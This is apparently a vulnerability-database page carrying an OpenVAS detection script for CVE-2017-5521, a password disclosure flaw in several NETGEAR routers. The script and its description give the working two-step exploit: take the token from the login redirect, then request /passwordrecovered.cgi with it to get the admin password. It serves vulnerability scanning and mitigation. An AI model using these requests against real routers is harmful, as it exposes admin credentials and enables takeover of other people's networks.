NETGEAR Devices Password Disclosure Vulnerability

2017-01-2300:00:00

plugins.openvas.org

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

CVSS3

8.1

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

8.3

Confidence

High

EPSS

0.973

Percentile

99.9%

JSON

Multiple NETGEAR devices are prone to an admin password disclosure
vulnerability

# SPDX-FileCopyrightText: 2017 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if (description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.106536");
  script_version("2024-07-01T05:05:39+0000");
  script_tag(name:"last_modification", value:"2024-07-01 05:05:39 +0000 (Mon, 01 Jul 2024)");
  script_tag(name:"creation_date", value:"2017-01-23 12:10:26 +0700 (Mon, 23 Jan 2017)");
  script_tag(name:"cvss_base", value:"4.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:P/I:N/A:N");
  script_tag(name:"severity_vector", value:"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_tag(name:"severity_origin", value:"NVD");
  script_tag(name:"severity_date", value:"2024-06-28 14:02:32 +0000 (Fri, 28 Jun 2024)");

  script_xref(name:"CISA", value:"Known Exploited Vulnerability (KEV) catalog");
  script_xref(name:"URL", value:"https://www.cisa.gov/known-exploited-vulnerabilities-catalog");
  script_cve_id("CVE-2017-5521");

  script_tag(name:"qod_type", value:"remote_vul");

  script_tag(name:"solution_type", value:"Mitigation");

  script_name("NETGEAR Devices Password Disclosure Vulnerability");

  script_category(ACT_ATTACK);

  script_copyright("Copyright (C) 2017 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");
  script_require_ports("Services/www", 8443);
  script_exclude_keys("Settings/disable_cgi_scanning");

  script_tag(name:"summary", value:"Multiple NETGEAR devices are prone to an admin password disclosure
  vulnerability");

  script_tag(name:"vuldetect", value:"Tries to recover the admin password.");

  script_tag(name:"insight", value:"An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300,
  R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password
  disclosure via simple crafted requests to the web management server. The bug is exploitable remotely if the
  remote management option is set, and can also be exploited given access to the router over LAN or WLAN. When
  trying to access the web panel, a user is asked to authenticate. If the authentication is canceled and password
  recovery is not enabled, the user is redirected to a page that exposes a password recovery token. If a user
  supplies the correct token to the page /passwordrecovered.cgi?id=TOKEN (and password recovery is not enabled),
  they will receive the admin password for the router.

  If password recovery is set the exploit will fail, as it will ask the user for the recovery questions that were
  previously set when enabling that feature. This is persistent (even after disabling the recovery option, the
  exploit will fail) because the router will ask for the security questions.");

  script_tag(name:"affected", value:"NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3,
  WNR3500Lv2, R6250, R6700, R6900 and R8000 devices");

  script_tag(name:"solution", value:"As a mitigation manually enable the password recovery feature on your
  device and ensure that remote management is disabled.");

  script_xref(name:"URL", value:"http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");

port = http_get_port(default: 8443);

res = http_get_cache(port: port, item: "/");

if ('Basic realm="NETGEAR' >!< res)
  exit(0);

token = eregmatch(pattern: "unauth.cgi\?id=([0-9]+)", string: res);
if (isnull(token[1]))
  exit(0);

token = token[1];

if (http_vuln_check(port: port, url: "/passwordrecovered.cgi?id=" + token,
                    pattern: "You can now log into the router using username .* and this recovered password",
                    extra_check: "Router Admin Password")) {
  report = http_report_vuln_url(port: port, url: "/passwordrecovered.cgi?id=" + token);
  security_message(port: port, data: report);
  exit(0);
}

exit(0);